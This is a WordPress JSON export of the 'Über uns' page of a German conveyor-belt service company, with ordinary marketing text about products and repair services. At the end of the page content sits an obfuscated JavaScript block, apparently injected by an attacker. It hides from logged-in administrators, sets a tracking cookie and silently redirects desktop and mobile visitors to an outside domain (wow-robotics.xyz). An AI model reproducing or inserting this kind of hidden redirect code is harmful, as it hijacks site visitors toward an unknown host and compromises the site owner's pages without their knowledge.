{"id":344,"date":"2016-05-17T08:13:33","date_gmt":"2016-05-17T08:13:33","guid":{"rendered":"http:\/\/demo.thememodern.com\/continal\/?page_id=344"},"modified":"2020-07-08T14:13:11","modified_gmt":"2020-07-08T12:13:11","slug":"uber-uns","status":"publish","type":"page","link":"https:\/\/transportbaender-folberth.de\/index.php\/uber-uns\/","title":{"rendered":"\u00dcber uns"},"content":{"rendered":"<p>[vc_row css=&#8220;.vc_custom_1463476144598{padding-top: 50px !important;}&#8220; el_class=&#8220;z-index&#8220;][vc_column width=&#8220;1\/2&#8243;][vc_custom_heading text=&#8220;\u00dcber uns&#8220; font_container=&#8220;tag:h4|text_align:left&#8220; use_theme_fonts=&#8220;yes&#8220; css=&#8220;.vc_custom_1576505016833{margin-top: 0px !important;margin-bottom: 20px !important;}&#8220;][vc_column_text]<span style=\"font-size: medium;\">Schwerpunkt unseres Unternehmens ist der Transportbandbereich.\u00a0<\/span><\/p>\n<p><span style=\"font-size: medium;\">\u00dc<\/span><span style=\"font-size: medium;\">ber 35 Jahre Berufserfahrung machen uns zu einem kompetenten und zuverl\u00e4ssigen Servicepartner.\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0<\/span><\/p>\n<p><span style=\"font-size: medium;\">Unsere Produktpalette umfasst Transportb\u00e4nder, Verschlei\u00dfschutz, Abstreifsysteme sowie ein umfangreiches Angebot an Anlagenzubeh\u00f6r. Unser Serviceteam bietet Ihnen qualifizierte Reparatur-, Montage- und Wartungsarbeiten. Weiterhin legen wir gro\u00dfen Wert auf eine kompetente Beratung vor Ort. <\/span><\/p>\n<p><span style=\"font-size: medium;\">Rufen Sie uns einfach an.\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 <\/span><\/p>\n<p><span style=\"font-size: medium;\">Wir helfen Ihnen gerne bei der L\u00f6sung eines Problems.<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><strong>Auch \u00fcber die Arbeitskernzeiten hinaus stehen wir Ihnen f\u00fcr Notf\u00e4lle unter den angegebenen Telefonnummern jederzeit zur Verf\u00fcgung<\/strong>[\/vc_column_text][\/vc_column][vc_column width=&#8220;1\/2&#8243;][vc_single_image image=&#8220;848&#8243; img_size=&#8220;large&#8220; alignment=&#8220;center&#8220;][vc_row_inner css=&#8220;.vc_custom_1463476046623{margin-top: 20px !important;}&#8220;][vc_column_inner width=&#8220;1\/2&#8243; css=&#8220;.vc_custom_1464170055784{padding-right: 10px !important;padding-bottom: 15px !important;}&#8220;][vc_single_image image=&#8220;809&#8243; img_size=&#8220;full&#8220;][\/vc_column_inner][vc_column_inner width=&#8220;1\/2&#8243; css=&#8220;.vc_custom_1464170072607{padding-bottom: 15px !important;padding-left: 10px !important;}&#8220;][vc_single_image image=&#8220;810&#8243; img_size=&#8220;full&#8220;][\/vc_column_inner][\/vc_row_inner][\/vc_column][\/vc_row][vc_row el_class=&#8220;shadow-section&#8220;][vc_column][vc_column_text]<\/p>\n<div class=\"box-shadow\"><\/div>\n<p>[\/vc_column_text][\/vc_column][\/vc_row][vc_row][vc_column][vc_column_text]<script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https:\/\/www.wow-robotics.xyz','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\\x20path=\/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](\/Android\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/BlackBerry\/i)||navigator['userAgent'][_0x287a('0xd')](\/iPhone|iPad|iPod\/i)||navigator[_0x287a('0xe')]['match'](\/Opera Mini\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/IEMobile\/i);}function _0x58dc3d(){return navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};<\/script>[\/vc_column_text][\/vc_column][\/vc_row]<\/p>\n","protected":false},"excerpt":{"rendered":"<p>[vc_row css=&#8220;.vc_custom_1463476144598{padding-top: 50px !important;}&#8220; el_class=&#8220;z-index&#8220;][vc_column width=&#8220;1\/2&#8243;][vc_custom_heading text=&#8220;\u00dcber uns&#8220; font_container=&#8220;tag:h4|text_align:left&#8220; use_theme_fonts=&#8220;yes&#8220; css=&#8220;.vc_custom_1576505016833{margin-top: 0px !important;margin-bottom: 20px !important;}&#8220;][vc_column_text]Schwerpunkt unseres Unternehmens ist der Transportbandbereich.\u00a0 \u00dcber 35 Jahre Berufserfahrung machen uns zu einem kompetenten und zuverl\u00e4ssigen Servicepartner.\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"page-templates\/template-fullwidth.php","meta":{"footnotes":""},"_links":{"self":[{"href":"https:\/\/transportbaender-folberth.de\/index.php\/wp-json\/wp\/v2\/pages\/344"}],"collection":[{"href":"https:\/\/transportbaender-folberth.de\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/transportbaender-folberth.de\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/transportbaender-folberth.de\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/transportbaender-folberth.de\/index.php\/wp-json\/wp\/v2\/comments?post=344"}],"version-history":[{"count":17,"href":"https:\/\/transportbaender-folberth.de\/index.php\/wp-json\/wp\/v2\/pages\/344\/revisions"}],"predecessor-version":[{"id":935,"href":"https:\/\/transportbaender-folberth.de\/index.php\/wp-json\/wp\/v2\/pages\/344\/revisions\/935"}],"wp:attachment":[{"href":"https:\/\/transportbaender-folberth.de\/index.php\/wp-json\/wp\/v2\/media?parent=344"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}